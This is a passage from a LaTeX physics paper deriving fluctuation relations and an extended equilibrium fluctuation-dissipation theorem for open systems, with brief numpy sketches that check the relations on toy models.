parameters }$\Delta\eta _{i}\rightarrow0$\textit{\ involves a strong
perturbation on the conjugated macroscopic observable }$\Delta
I^{i}\rightarrow\infty$\textit{, and hence, }$I^{i}$\textit{\
becomes indeterminable; any attempt to reduce this perturbation to
zero, }$\Delta I^{i}\rightarrow0$\textit{, makes impossible to
determine the conjugated thermodynamic parameter
}$\beta_{i}^{s}$\textit{ by
using the condition of thermal equilibrium (\ref{thermal.ave}) since }%
$\Delta\eta_{i}\rightarrow\infty$\textit{.}
The present result constitutes clear evidence of the existence
of \textit{complementary relations in any physical theory with a
statistical formulation}, an idea postulated by Bohr in the early
days of quantum mechanics \cite{bohr,Heisenberg} with a long history
in the literature
\cite{Rosenfeld,Mandelbrot,Gilmore,Lindhard,Lavenda,Scholg,Uffink}.
Although our results are intimately related to other approaches
based on fluctuation theory \cite{Rosenfeld,Gilmore,Scholg}, there
exist subtle but fundamental differences distinguishing the present
proposal from previous attempts. The interested
reader can find a more complete discussion of this subject in
Ref.\cite{Vel.PRA}.
Let us now discuss some consequences of the associated fluctuation
relation (\ref{assoc.fluct}). The quantities $\zeta_{ij}$:
\begin{equation}
\zeta_{ij}=\left\langle \partial_{i}%
\eta_{j}\right\rangle =-\int_{\Gamma}\rho\left( I\right)
\partial_{i}\partial_{j}\log
\rho\left( I\right) dI \label{hintegral}%
\end{equation}
are just the expectation values of the Hessian of the logarithm of
the distribution function $P_{ij}\left( I\right) $:
\begin{equation}
P_{ij}\left( I\right) =-\partial_{i}\partial_{j}\log \rho\left(
I\right) ,
\label{matrix function}%
\end{equation}
which can be referred to as the \textit{probabilistic Hessian}. Due
to the positive definite character of the correlation matrix
$O=\left[O_{ij}\right]$ with components $O_{ij}=\left\langle
\delta\eta_{i}\delta\eta_{j}\right\rangle $:
\begin{equation}
a^{i}a^{j}O_{ij}\equiv\left\langle \left( a^{i}\delta\eta_{i}\right)
^{2}\right\rangle \geq0,
\end{equation}
as well as the applicability of the associated fluctuation relation
(\ref{assoc.fluct}), $\zeta_{ij}=O_{ij}$, the quantities
$\zeta_{ij}$ constitute the components of \textit{a positive
definite symmetric matrix} $\zeta=\left[ \zeta_{ij}\right] $.
The positive definite character of the matrix $\left[ \zeta_{ij}\right]
$ does not imply a positive definite character of the probabilistic
Hessian (\ref{matrix function}) for every macrostate
$I\in\Gamma$. Admitting the existence of a certain region\textit{\ }%
$\mathcal{A}^{\omega}\subset\Gamma$ where this last condition does
not hold for any admissible value of the internal control parameters
that drive the form of the probabilistic weight
$\omega(I)$\footnote{For example, the thermodynamic parameters
$(\beta,Y)$ of the Boltzmann-Gibbs distribution (\ref{BGD}), the
total additive quantities $I_{T}$ of distribution (\ref{pp1}), or
the formal parameters $a$ of distribution (\ref{ansatz2}).}, the
positive definite character of $\zeta_{ij}$ indicates that
\textit{macrostates belonging to the subset
}$\mathcal{A}^{\omega}$\textit{ always make a negligible contribution to
the integral of} Eq.(\ref{hintegral}). If the system size $N$ is
sufficiently large, the thermal fluctuations $\delta I^{i}$ and
$\delta\eta_{i}$ become negligible and the distribution function
$\rho\left( I\right) $ significantly differs from zero only in a very
small neighborhood around its local maxima. In this limit, all
system macrostates $I\in\mathcal{A}^{\omega}$ turn
\textit{inaccessible or thermodynamically unstable}. Since the
probabilistic Hessian (\ref{matrix function}) depends on the
particular mathematical form of the probabilistic weight
$\omega\left( I\right) $ that accounts for the external influence
of the environment, it is possible to claim the following:
\textbf{Claim 2:} \textit{The thermodynamic stability conditions and
the fluctuating behavior of a given open system in (quasi-stationary)
equilibrium depend on the nature of the external
conditions which have been imposed on it.}
This last conclusion appears to be self-evident and natural, but it
contrasts with some familiar equilibrium fluctuation relations such
as the ones shown in Eq.(\ref{familiar.fd}), which seem to suggest
(falsely) that system stability and fluctuating behavior only depend
on its intrinsic properties: \textit{the response functions}.
However, such a conclusion is only strictly correct for an equilibrium
situation described by the Boltzmann-Gibbs distributions
(\ref{bg.w}). An illustrative example is the framework of
application of the canonical fluctuation relation
$C=\beta^{2}\left\langle\delta U^{2}\right\rangle$. The internal
energy $U$ fluctuates when the system is put in thermal contact
with a bath, but it remains constant when the system is
energetically isolated, and hence, there is no connection between the
energy fluctuations and the heat capacity in the latter situation.
\subsection{\label{FGL}Gaussian approximation}
Fluctuation relations (\ref{fundamental}) and (\ref{assoc.fluct})
constitute two general mathematical results. The price to pay in
order to arrive at a suitable extension of the familiar equilibrium
fluctuation relations (\ref{familiar.fd}) is the consideration of a
\textit{Gaussian approximation} for thermal fluctuations, which
appears as a licit treatment when the size $N$ of the system under
consideration is sufficiently large.
Let us admit that the distribution function (\ref{new}) only
exhibits one (Gaussian) peak around the most likely macrostate
$\bar{I} $:
\begin{equation}
\rho\left( I\right) \propto\exp\left[ - \frac12 C_{ij}\delta
I^{i}\delta I^{j}\right] ,
\end{equation}
with $\delta I^{i}=I^{i}-\bar{I}^{i}$. Since the thermal
fluctuations $\delta I$ are small, the fluctuations of any
continuous and differentiable function $A\left( I\right) $ can be
expressed in a first-order approximation as follows:
\begin{equation}
\delta A\left( I\right) \simeq\partial_{i}A\left( \bar{I}\right)
\delta I^{i}.\label{first.ord}
\end{equation}
Formally, the thermodynamic parameters of the system $\beta_{i}^{s}%
=\partial_{i}S\left( I\right) $ depend on the macroscopic
observables $I$. Thus, their fluctuations $\delta\beta_{i}^{s}$ can
be expressed by using the first-order approximation
(\ref{first.ord}):
\begin{equation}
\delta\beta_{i}^{s}=\partial_{k}\beta_{i}^{s}\left( \bar{I}\right)
\delta
I^{k}=H_{ik}\left( \bar{I}\right) \delta I^{k}, \label{hh}%
\end{equation}
with $H_{ij}\left( \bar{I}\right) =\partial_{i}\partial_{j}S\left(
\bar {I}\right) $ being the value of the \textit{entropy Hessian}
at the most likely macrostate. The substitution of Eq.(\ref{hh})
into the fundamental fluctuation relation
(\ref{fundamental}) allows to obtain the following expression:%
\begin{equation}
\left\langle \delta\beta_{i}^{\omega}\delta I^{j}\right\rangle =\delta_{i}%
^{j}+H_{ik}\left( \bar{I}\right) \left\langle \delta I^{k}\delta
I^{j}\right\rangle . \label{FGA}%
\end{equation}
By using these same reasonings, the associated fluctuation relation
(\ref{assoc.fluct}) can be rewritten as follows:%
\begin{equation}
\partial_{i}\eta_{j}\left( \bar{I}\right) =\left\langle \delta\eta_{i}%
\delta\eta_{j}\right\rangle . \label{AGA}%
\end{equation}
Result (\ref{AGA}) shows that the regions of thermodynamic
stability are those macrostates where the probabilistic Hessian:
\begin{equation}
P_{ij}\left( \bar{I}\right) =\partial_{i}\eta_{j}\left(
\bar{I}\right) =-\partial_{i}\partial_{j}\left\{ \log\omega\left(
\bar{I}\right) +S\left(
\bar{I}\right) \right\} , \label{PH2}%
\end{equation}
is a positive definite matrix. Besides, Eqs.(\ref{FGA}) and
(\ref{AGA}) indicate that the system fluctuating behavior and its
stability conditions depend on the external conditions imposed
on it (Claim 2), which are characterized here by the
correlations $\left\langle \delta\beta _{i}^{\omega}\delta
I^{j}\right\rangle $ and the Hessian of the logarithm of the
probabilistic weight with opposite sign, $F_{ij}\left( \bar{I}\right)
=-\partial_{i}\partial_{j}\log\omega\left( \bar{I}\right) $.
It is not difficult to verify that these identities provide the same
qualitative information about the system thermodynamic stability.
For example, the equilibrium conditions associated with the
Boltzmann-Gibbs distributions (\ref{bg.w}) follow from
imposing the constraint $\delta\beta_{i}^{\omega}=0$ in
Eq.(\ref{FGA}). Thus, the correlation matrix $C^{ij}=\left\langle
\delta I^{i}\delta I^{j}\right\rangle $ is given by the inverse
matrix of the entropy Hessian $H_{ij}\left( \bar {I}\right) $ with
opposite sign:
\begin{equation}
-H^{ij}\left( \bar{I}\right) \equiv C^{ij}, \label{basic}%
\end{equation}
which is a well-known result of classical fluctuation theory
\cite{landau}. Since the correlation function $C^{ij}$ is always a
positive definite matrix:
\begin{equation}
a_{i}a_{j}C^{ij}\equiv\left\langle \left( a_{i}\delta I^{i}\right)
^{2}\right\rangle \geq0,
\end{equation}
the peaks of the Boltzmann-Gibbs distribution (\ref{BGD}) will never
be located in those regions where $H_{ij}\left( I\right) $ is
not a negative definite matrix, that is, where the entropy $S$
\textit{is not a locally concave function}. Thus, these macrostates
turn inaccessible in the limit of large system size $N$, so that
all of them constitute the unstable region
$\mathcal{A}^{\omega}=\mathcal{A}^{BG}$ of this particular ensemble.
Clearly, this is the same conclusion derived from Eqs.(\ref{AGA})
and (\ref{PH2}). As a by-product of the present reasonings, we have
arrived at the following:
\textbf{Claim 3:} \textit{The direct observation of unstable
macrostates $I\in\mathcal{A}^{BG}$ of the Boltzmann-Gibbs
distributions (\ref{BGD}) is only possible when $\left\langle
\delta\beta_{i}^{\omega}\delta I^{j}\right\rangle \not =0$, that is,
by considering an equilibrium situation where the internal
thermodynamic state of the environment is affected by thermodynamic
interaction with the system.}
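The classical result (\ref{basic}) admits a quick numerical illustration. The following minimal sketch assumes a toy system with $\Omega(U)\propto U^{N-1}$, so that $S=(N-1)\log U$, in contact with a Boltzmann-Gibbs bath; the exact canonical distribution is then a Gamma distribution, whose variance reproduces $-H^{-1}(\bar{U})$ up to $O(1/N)$ corrections:

```python
import numpy as np

rng = np.random.default_rng(3)
N, beta = 1000, 2.0                  # toy system: Omega(U) proportional to U**(N-1)

# Exact canonical sampling: rho(U) ~ U**(N-1) * exp(-beta*U) is Gamma(N, 1/beta)
U = rng.gamma(shape=N, scale=1.0 / beta, size=200_000)

U_bar = (N - 1) / beta               # most likely macrostate: dS/dU = (N-1)/U = beta
H = -(N - 1) / U_bar**2              # entropy Hessian at U_bar
print(U.var(), -1.0 / H)             # Eq. (basic): <dU^2> approx -H^{-1}
```

The agreement improves with growing $N$, consistently with the Gaussian approximation.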
There exists within the Gaussian approximation a fluctuation relation
which has no counterpart within the Boltzmann-Gibbs distributions,
since it involves the correlation matrix $B_{ij}=\left\langle
\delta\beta_{i}^{\omega }\delta\beta_{j}^{\omega}\right\rangle $. By
using the first-order approximation:
\begin{equation}
\delta\beta_{i}^{\omega}=\partial_{j}\beta_{i}^{\omega}\left(
\bar{I}\right)
\delta I^{j}=F_{ij}\left( \bar{I}\right) \delta I^{j}%
\end{equation}
one can express the correlation matrix $B_{ij}=\left\langle
\delta\beta
_{i}^{\omega}\delta\beta_{j}^{\omega}\right\rangle $ as follows:%
\begin{equation}
\left\langle
\delta\beta_{i}^{\omega}\delta\beta_{j}^{\omega}\right\rangle
=F_{jk}\left( \bar{I}\right) \left\langle
\delta\beta_{i}^{\omega}\delta I^{k}\right\rangle .
\end{equation}
For the sake of simplicity, let us adopt the notation $\bar{F}_{ij}%
=F_{ij}\left( \bar{I}\right) $ and $\bar{H}_{ij}=H_{ij}\left( \bar
{I}\right) $. By applying the fluctuation relation
(\ref{FGA}) twice and the approximation
\begin{equation}
\left\langle \delta\beta_{i}^{\omega}\delta I^{j}%
\right\rangle =\bar{F}_{im}\left\langle \delta I^{m}\delta
I^{j}\right\rangle ,
\end{equation}
one obtains:
\begin{equation}
\left\langle
\delta\beta_{i}^{\omega}\delta\beta_{j}^{\omega}\right\rangle
=\bar{F}_{ij}+\bar{H}_{ij}+\bar{H}_{im}C^{mn}\bar{H}_{nj}.
\end{equation}
This result can be conveniently rewritten by performing the matrix
product with the correlation matrix $C^{ij}=\left\langle \delta
I^{i}\delta I^{j}\right\rangle $:
\begin{eqnarray}
B_{ik}C^{kj} =\bar{F}_{ik}C^{kj}+\bar{H}_{ik}C^{kj}+\bar{H}_{im}C^{mn}%
\bar{H}_{nk}C^{kj}\nonumber\\
=\delta_{i}^{j}+2\bar{H}_{ik}C^{kj}+\bar{H}_{im}C^{mn}\bar{H}_{nk}C^{kj}.
\end{eqnarray}
It is possible to recognize that the right hand side of the above
equation is simply the term $M_{i}^{k}M_{k}^{j}$, where
$M_{i}^{j}=\delta_{i}^{j}+\bar {H}_{ik}C^{kj}$ denotes the
correlation matrix $M_{i}^{j}=\left\langle
\delta\beta_{i}^{\omega}\delta I^{j}\right\rangle $ of
Eq.(\ref{FGA}). Thus, we have derived a \textit{complementary
fluctuation relation}:
\begin{equation}
\left\langle
\delta\beta_{i}^{\omega}\delta\beta_{k}^{\omega}\right\rangle
\left\langle \delta I^{k}\delta I^{j}\right\rangle =\left\langle
\delta \beta_{i}^{\omega}\delta I^{k}\right\rangle \left\langle
\delta\beta _{k}^{\omega}\delta I^{j}\right\rangle,
\end{equation}
or its equivalent representation in matrix form:
\begin{equation}\label{complementary}
B_{ik}C^{kj}=M_{i}^{k}M_{k}^{j}. \label{comp.tur}%
\end{equation}
Generally speaking, the elements of the correlation matrix
$M_{i}^{j}=\left\langle \delta\beta_{i}^{\omega}\delta
I^{j}\right\rangle $ could be very difficult to measure in a given
experimental situation, since they demand simultaneous
measurements of the system observables $I$ and the thermodynamic
parameters of the environment $\beta^{\omega}$. The complementary
fluctuation relation (\ref{complementary}) allows one to obtain
these correlations indirectly, by performing independent
measurements of the fluctuations of the system observables $I$ and
of the environment thermodynamic parameters $\beta^{\omega}$.
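Within the Gaussian approximation, the relation (\ref{comp.tur}) can be checked directly. A minimal sketch (assuming a hypothetical two-observable model in which $\delta\beta_{i}^{\omega}=\bar{F}_{ij}\delta I^{j}$, with a prescribed symmetric matrix $\bar{F}$ and covariance matrix $C$):

```python
import numpy as np

rng = np.random.default_rng(2)
C_true = np.array([[2.0, 0.6], [0.6, 1.0]])   # hypothetical covariance <dI dI>
F = np.array([[1.5, -0.3], [-0.3, 0.8]])      # hypothetical F_ij (symmetric)

dI = rng.multivariate_normal([0.0, 0.0], C_true, size=500_000)
dbeta = dI @ F                                 # first-order fluctuations of beta^omega

C = np.cov(dI, rowvar=False)                   # C^{ij} = <dI^i dI^j>
B = np.cov(dbeta, rowvar=False)                # B_{ij} = <dbeta_i dbeta_j>
M = dbeta.T @ dI / len(dI)                     # M_i^j  = <dbeta_i dI^j>

print(np.allclose(B @ C, M @ M, rtol=0.1))     # complementary relation B C = M M
```

Here all three correlation matrices are estimated from the same samples, yet the matrix identity $BC=MM$ holds up to sampling noise.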
\subsection{Extended equilibrium fluctuation-dissipation theorem}
For convenience, let us re-derive here the fluctuation relations
associated with the Boltzmann-Gibbs distribution (\ref{bg.w}). The
direct way to carry out this aim is by starting from the partition
function $Z\left( \beta\right) $:
\begin{equation}
Z\left( \beta\right) =\int_{\Gamma}\exp\left(
-\beta_{i}I^{i}\right) \Omega\left( I\right) dI.
\end{equation}
Let us denote by $\partial^{i}A\left( \beta\right) =\partial
A\left( \beta\right) /\partial\beta_{i}$ the first partial
derivatives of an arbitrary function $A\left( \beta\right) $
defined on the thermodynamic parameters $\beta$. It is easy to
verify the validity of the following identities:
\begin{equation}
\left\langle I^{i}\right\rangle =-\partial^{i}\log Z\left(
\beta\right) ,~\left\langle \delta I^{i}\delta I^{j}\right\rangle
=\partial^{i}\partial ^{j}\log Z\left( \beta\right) .
\end{equation}
The substitution of the first relation into the second one yields:%
\begin{equation}
\chi_{BG}^{ij}=C^{ij}=\left\langle \delta I^{i}\delta
I^{j}\right\rangle ,
\label{can.fr}%
\end{equation}
where the symmetric matrix $\chi_{BG}^{ij}$:
\begin{equation}
\chi_{BG}^{ij}=-\frac{\partial\left\langle I^{j}\right\rangle
}{\partial
\beta_{i}} \label{can.resp}%
\end{equation}
will be referred to as the \textit{canonical response matrix}. Since
the correlation matrix $C^{ij}=\left\langle \delta I^{i}\delta
I^{j}\right\rangle
$ is a positive definite matrix, the canonical response matrix $\chi_{BG}%
^{ij}$ is also a positive definite matrix.
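The canonical identities above are straightforward to verify. A minimal sketch for a hypothetical two-level system with energies $\{0,\epsilon\}$, where $Z(\beta)=1+e^{-\beta\epsilon}$, compares numerical derivatives of $\log Z$ with the exact occupation probability:

```python
import numpy as np

eps, beta, h = 1.0, 0.7, 1e-4         # hypothetical two-level system; finite-difference step

def logZ(b):
    return np.log(1.0 + np.exp(-b * eps))   # Z(beta) = 1 + exp(-beta*eps)

U_mean = -(logZ(beta + h) - logZ(beta - h)) / (2 * h)              # <U> = -d logZ / d beta
U_var = (logZ(beta + h) - 2 * logZ(beta) + logZ(beta - h)) / h**2  # <dU^2> = d^2 logZ / d beta^2

p = np.exp(-beta * eps) / (1.0 + np.exp(-beta * eps))  # occupation of the excited level
print(U_mean, eps * p)                 # both equal <U>
print(U_var, eps**2 * p * (1 - p))     # canonical fluctuation relation chi_BG = <dU^2>
```

The second derivative of $\log Z$ reproduces $\epsilon^{2}p(1-p)$, the exact energy variance of this toy system.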
The identity (\ref{can.fr}) is a rigorous result within the
Boltzmann-Gibbs distributions (\ref{bg.w}). Notice that an analogous
expression can be derived within the Gaussian approximation from the
fluctuation relation (\ref{FGA}) after imposing the restriction
$\delta\beta_{i}^{\omega}=0$, that is, Eq.(\ref{basic}), which can
be rephrased as:
\begin{equation}
\chi_{s}^{ij}=\left\langle \delta I^{i}\delta I^{j}\right\rangle ,
\label{mic.fr}%
\end{equation}
with $\chi_{s}^{ij}$ being the inverse matrix of the entropy Hessian
with opposite sign evaluated at the most likely macrostate:
\begin{equation}
\chi_{s}^{ij}=-H^{ij}\left( \bar{I}\right) . \label{mic.resp}%
\end{equation}
Comparison between Eqs.(\ref{can.fr}) and (\ref{mic.fr}) allows us
to establish the relationship $\chi_{BG}^{ij}\sim\chi_{s}^{ij}$, which
justifies referring to $\chi_{s}^{ij}$ as the \textit{microcanonical
response matrix} of the system.
The microcanonical response matrix $\chi_{s}^{ij}$ defined above is
a \textit{purely microcanonical quantity}, that is, it is an
intrinsic thermodynamic quantity that can be attributed to an
isolated system. Actually, the physical meaning of such a response
matrix is \textit{unclear}. In general, a response function
characterizes the\textit{\ sensitivity of the system to
external control}, and consequently, such a concept is only relevant
for an open system. While this physical relevance is satisfied by
the canonical response matrix $\chi_{BG}^{ij}$, its applicability is
restricted to the case where the thermodynamic influence of the
environment corresponds to the Boltzmann-Gibbs distributions
(\ref{bg.w}), where the thermodynamic parameters $\left\{
\beta_{i}\right\} $ are constant parameters instead of
\textit{fluctuating quantities}.
According to these last reasonings, the concept of response matrix
$\chi^{ij}$\ should be extended in order to be applicable in a
more general system-environment equilibrium situation. Since the
physical observables $I$\ and the (control) thermodynamic variables
$\beta^{\omega}$ undergo, in general, thermal fluctuations, a
simple operational definition for the concept of response matrix
$\chi^{ij}_{\omega}$ can be introduced in terms of expectation
values as follows:
\begin{equation}
\chi^{ij}_{\omega}=-\frac{\partial\left\langle I^{j}\right\rangle
}{\partial \left\langle \beta_{i}^{\omega}\right\rangle
}\equiv-\frac{\partial
\left\langle I^{j}\right\rangle }{\partial\left\langle \beta_{i}%
^{s}\right\rangle }. \label{operational.def}%
\end{equation}
Here, we have taken into account the equilibrium conditions
$\left\langle \beta_{i}^{\omega}\right\rangle =\left\langle
\beta_{i}^{s}\right\rangle $.
Clearly, definition (\ref{operational.def}) contains the canonical
response matrix $\chi_{BG}^{ij}$ as a particular case when
$\delta\beta_{i}^{\omega
}=0\Rightarrow\beta_{i}^{\omega}=\beta_{i}\sim const$. The response
matrix $\chi^{ij}_{\omega}$ defined in this way is more realistic
and general than the one associated with the canonical response
matrix (\ref{can.resp}). The canonical response matrix
$\chi_{BG}^{ij}$ presupposes that the control parameters $\left\{
\beta_{i}\right\} $ have no fluctuations. Such a requirement is
clearly an idealization, since \textit{any real measuring process
always involves a perturbation of the thermodynamic state of the
measuring apparatus}.
a thermometer and the pressure indicated by a barometer are affected
by the thermodynamic influence of the system under study. In
practice, the true values of temperature $T$ and pressure $p$
employed to calculate the heat capacity $C_{p}$ at constant pressure
and the isothermal compressibility $K_{T}$ of a given system are
actually \textit{expectation values}, $\left\langle T\right\rangle $
and $\left\langle p\right\rangle $. Therefore, the practical
operational definition of these concepts reads as follows:
\begin{equation}
C_{p}=\left\langle T\right\rangle \left( \frac{\partial\left\langle
S\right\rangle }{\partial\left\langle T\right\rangle }\right)
_{\left\langle p\right\rangle },~K_{T}=-\frac{1}{\left\langle
V\right\rangle }\left( \frac{\partial\left\langle V\right\rangle
}{\partial\left\langle p\right\rangle }\right) _{\left\langle
T\right\rangle },
\end{equation}
where we have taken into consideration the stochastic character of
the energy $U$, the volume $V$ and the entropy $S=S\left( U,V\right)
$.
As already discussed, the expectation values $\left\langle
I^{i}\right\rangle $ and $\left\langle \beta_{i}^{s}\right\rangle $
are given within the Gaussian approximation by the corresponding
values at the most likely macrostate $\bar{I}$, $\left\langle
I^{i}\right\rangle =\bar{I}^{i}$ and $\left\langle
\beta_{i}^{s}\right\rangle =\bar{\beta}_{i}^{s}=\beta_{i}^{s}\left(
\bar
{I}\right) $, which allows us to rewrite Eq.(\ref{operational.def}) as follows:%
\begin{equation}
\chi^{ij}_{\omega}=-\frac{\partial\bar{I}^{j}}{\partial\bar{\beta}_{i}^{s}}=\chi
_{s}^{ij}\left( \bar{I}\right) . \label{identification}%
\end{equation}
\textbf{Claim 4:} \textit{The response matrix
}$\chi^{ij}_{\omega}$\textit{ of
Eq.}(\ref{operational.def})\textit{\ could be identified with the
microcanonical response matrix }$\chi_{s}^{ij}$ (\ref{mic.resp}%
)\textit{ at the most likely macrostate }$\bar{I}$\textit{ as long
as the Gaussian approximation applies}.
Equilibrium fluctuation relation (\ref{mic.fr}) is inapplicable
within the anomalous region $\mathcal{A}^{BG}$ of the
Boltzmann-Gibbs distributions because the microcanonical response
matrix $\chi_{s}^{ij}$ is no longer a positive definite matrix there.
\textbf{Claim 5:} \textit{The unstable region of the Boltzmann-Gibbs
distributions} $\mathcal{A}^{BG}$ \textit{corresponds to macrostates
with anomalous values of the response functions, such as macrostates
with negative heat capacities at constant pressure $C_{p}<0$ or
negative isothermal compressibilities $K_{T}<0$ in a fluid system,
or macrostates with negative heat capacities at constant magnetic
field $C_{H}<0$ or negative isothermal magnetic susceptibilities $\chi_{T}<0$
in a paramagnetic system.}
As already shown, the presence of macrostates with anomalous values
of response functions is incompatible with the imposition of the
restriction $\delta\beta_{i}^{\omega}=0$ into the fluctuation
relation (\ref{FGA}). However, this same fluctuation relation can be
rewritten to obtain an extension of Eq.(\ref{mic.fr}), which is
expressed here in the following:
\textbf{Theorem:} \textit{The system fluctuating behavior
$C^{ij}=\left\langle \delta I^{i}\delta I^{j}\right\rangle$ is
determined within the Gaussian approximation by its response
$\chi_{\omega}^{ij}=-\partial\left\langle
I^{j}\right\rangle/\partial\left\langle
\beta^{\omega}_{i}\right\rangle$
and by the incidence of the correlative effects $M^{j}_{i}=\left\langle \delta\beta_{i}^{\omega}\delta I^{j}%
\right\rangle$ that appear as a consequence of the external
influence of the environment, through the following fluctuation
relation:}
\begin{equation}
\chi_{\omega}^{ij}=C^{ij}+\chi_{\omega}^{ik}M_{k}^{j}. \label{gfdr}%
\end{equation}
Eq.(\ref{gfdr}) constitutes the central result of this work. Since
the fluctuation relation (\ref{can.fr}) is simply the equilibrium
version of the so-called \textit{fluctuation-dissipation theorem},
the expression (\ref{gfdr}) can be unambiguously referred to as the
\textit{extended equilibrium fluctuation-dissipation theorem}. It
accounts for the system fluctuating behavior beyond the
equilibrium thermodynamic conditions associated with the
Boltzmann-Gibbs distributions (\ref{BGD}) in a way that is
compatible with the existence of anomalous response functions. As
already discussed, its validity relies on the applicability of the
Gaussian approximation, which is a licit treatment in the
limit of large system size $N$. As expected, the present theorem
comprises all the preliminary conclusions obtained throughout this
work, with the exception of claim 1, which was obtained from a more
general equilibrium fluctuation relation, Eq.(\ref{fundamental}).
Let us finally obtain the form of the extended equilibrium
fluctuation-dissipation theorem (\ref{gfdr}) in terms of the
ordinary thermodynamic variables and potentials of statistical
mechanics and thermodynamics: $\left( U,\beta\right) $ and $\left(
X,Y\right) $ and the Enthalpy $G=U+YX$. The known relations:%
\begin{equation}%
\begin{array}
[c]{c}%
-\partial_{\beta}\log Z\left( \beta,Y\right) =\left\langle
G\right\rangle ,~\beta\left\langle X\right\rangle =-\partial_{Y}\log
Z\left( \beta,Y\right)
\\
\partial_{\beta}^{2}\log Z\left( \beta,Y\right) =\left\langle \delta
Q^{2}\right\rangle ,~\partial_{Y}^{2}\log Z\left( \beta,Y\right)
=\beta
^{2}\left\langle \delta X^{2}\right\rangle ,\\
\partial_{\beta}\partial_{Y}\log Z\left( \beta,Y\right) =\beta\left\langle
\delta Q\delta X\right\rangle ,
\end{array}
\end{equation}
allow us to re-express Eq.(\ref{can.fr}) in a compact matrix form as
follows:
\begin{equation}
\mathcal{R}=\mathcal{F},\label{can1}%
\end{equation}
where the response and the correlation matrices $\mathcal{R}$ and
$\mathcal{F}$ are given by:
\begin{equation}%
\begin{array}
[c]{c}%
\mathcal{R}=-\left(
\begin{array}
[c]{cc}%
\partial_{\beta}\left\langle G\right\rangle & \partial_{\beta}\left(
\beta\left\langle X\right\rangle \right) \\
\partial_{Y}\left\langle G\right\rangle & \beta\partial_{Y}\left\langle
X\right\rangle
\end{array}
\right) ,\\
\mathcal{F}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta Q^{2}\right\rangle & \beta\left\langle \delta
Q\delta
X\right\rangle \\
\beta\left\langle \delta X\delta Q\right\rangle &
\beta^{2}\left\langle \delta X^{2}\right\rangle
\end{array}
\right) .
\end{array}
\label{asso.FR}%
\end{equation}
It is important to keep in mind that the Enthalpy fluctuation
$\delta G$ within the Boltzmann-Gibbs distribution (\ref{BGD}) is
the amount of heat $\delta Q$ exchanged between the system and its
environment at equilibrium, $\delta G=\delta U+Y\delta X=\delta
Q$. Such a relationship does not hold in general, since $\delta
G=\delta Q+X\delta Y$ when the fluctuations $\delta Y$ are taken
into consideration. The matrix form of the fluctuation-dissipation
relations (\ref{can.fr}) in terms of the conjugated thermodynamic
variables $\left( U,\beta\right) $ and $\left( X,\xi\right) $
with $\xi=\beta Y$
reads as follows:%
\begin{equation}
\chi=C,\label{can2}%
\end{equation}
where the response and the correlation matrices $\chi$ and $C$ are given by:%
\begin{eqnarray}
\chi=-\left(
\begin{array}
[c]{cc}%
\partial_{\beta}\left\langle U\right\rangle & \partial_{\beta}\left\langle
X\right\rangle \\
\partial_{\xi}\left\langle U\right\rangle & \partial_{\xi}\left\langle
X\right\rangle
\end{array}
\right) , \\
C=\left(
\begin{array}
[c]{cc}%
\left\langle \delta U^{2}\right\rangle & \left\langle \delta
U\delta
X\right\rangle \\
\left\langle \delta X\delta U\right\rangle & \left\langle \delta
X^{2}\right\rangle
\end{array}
\right).
\end{eqnarray}
One can verify the existence of the following transformation rules
between these two representations:
\begin{equation}
\mathcal{F}=\mathcal{T}C\mathcal{T}^{T},~\mathcal{R}=\mathcal{T}%
\chi\mathcal{T}^{T},
\end{equation}
where the transformation matrix $\mathcal{T}$ is given by:%
\begin{equation}
\mathcal{T}=\left(
\begin{array}
[c]{cc}%
1 & Y\\
0 & \beta
\end{array}
\right) .
\end{equation}
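This transformation rule is a purely linear-algebraic statement about second moments, so it can be checked numerically on synthetic Gaussian fluctuations. The sketch below is illustrative only: the values of $\beta$, $Y$ and the covariance are arbitrary, and the relation $\delta Q=\delta U+Y\delta X$ makes the check exact sample by sample.

```python
import numpy as np

rng = np.random.default_rng(0)
beta, Y = 1.3, 0.7                      # environment parameters (illustrative values)

# correlated fluctuations (dU, dX) drawn from an arbitrary zero-mean Gaussian
cov = np.array([[2.0, 0.5], [0.5, 1.0]])
u = rng.multivariate_normal([0.0, 0.0], cov, size=50_000)   # rows: (dU, dX)

T = np.array([[1.0, Y], [0.0, beta]])   # transformation matrix between representations
C = u.T @ u / len(u)                    # correlation matrix in the (U, X) representation

v = u @ T.T                             # rows: (dQ, beta*dX), with dQ = dU + Y*dX
F = v.T @ v / len(v)                    # correlation matrix in the (G, X) representation

assert np.allclose(F, T @ C @ T.T)      # the transformation rule F = T C T^T
```

The check succeeds exactly because $(\delta Q,\beta\,\delta X)^{T}=\mathcal{T}(\delta U,\delta X)^{T}$ holds for every sample.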
Finally, one can rewrite the compact matrix form of extended
equilibrium fluctuation-dissipation theorem (\ref{gfdr}) in these
equivalent representations as follows:
\begin{equation}
\chi=C+\chi M\Leftrightarrow\mathcal{R}=\mathcal{F}+\mathcal{RM}%
\label{gen.fdr}%
\end{equation}
where the correlation matrices $M$ and $\mathcal{M}$ are given by:%
\begin{equation}%
\begin{array}
[c]{c}%
M=\left(
\begin{array}
[c]{cc}%
\left\langle \delta\beta^{\omega}\delta U\right\rangle &
\left\langle
\delta\beta^{\omega}\delta X\right\rangle \\
\left\langle \delta\xi^{\omega}\delta U\right\rangle & \left\langle
\delta \xi^{\omega}\delta X\right\rangle
\end{array}
\right) ,\\
\mathcal{M}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta\beta^{\omega}\delta Q\right\rangle &
\beta\left\langle
\delta\beta^{\omega}\delta X\right\rangle \\
\left\langle \delta Y^{\omega}\delta Q\right\rangle &
\beta\left\langle \delta Y^{\omega}\delta X\right\rangle
\end{array}
\right) ,
\end{array}
\label{A2.FR}%
\end{equation}
which are related by the transformation rule:
\begin{equation}
\mathcal{M}=\left( \mathcal{T}^{T}\right) ^{-1}M\mathcal{T}^{T}.
\end{equation}
As expected, the quantities $\left( \beta^{\omega},Y^{\omega}\right)
$ denote the thermodynamic parameters of the environment.
\section{Examples of application}
\subsection{Application to fluid and
magnetic systems}
Direct application of Eqs.(\ref{asso.FR}) and (\ref{A2.FR}) to the
thermodynamic variables of a fluid system with Enthalpy $G=U+pV$
leads to the following expressions of the matrices $\mathcal{R}$,
$\mathcal{F}$ and $\mathcal{M}$:
\begin{equation}%
\begin{array}
[c]{c}%
\mathcal{R}=\left(
\begin{array}
[c]{cc}%
T^{2}C_{p} & V\left( T\alpha_{p}-1\right) \\
-\left( \partial G/\partial p\right) _{T} & \beta VK_{T}%
\end{array}
\right) ,\\
\mathcal{F}=\left(
\begin{array}
[c]{cc}%
